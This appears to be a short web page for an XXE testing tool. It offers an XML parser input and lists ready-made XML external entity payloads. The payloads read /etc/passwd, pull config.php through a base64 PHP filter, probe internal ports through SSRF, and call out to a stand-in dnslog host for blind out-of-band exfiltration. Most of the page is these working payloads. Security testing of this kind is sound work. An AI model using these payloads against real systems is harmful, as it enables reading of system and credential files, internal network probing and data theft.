XML Parser (XXE Test)
Upload or paste XML data to parse.
Test XXE Payload
More XXE Payloads
- File read:
<!ENTITY xxe SYSTEM "file:///etc/passwd"> - PHP filter:
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=config.php"> - SSRF (internal port scan):
<!ENTITY xxe SYSTEM "http://127.0.0.1:80"> - Blind XXE (out-of-band):
<!ENTITY xxe SYSTEM "http://YOUR_SERVER.dnslog.cn/test">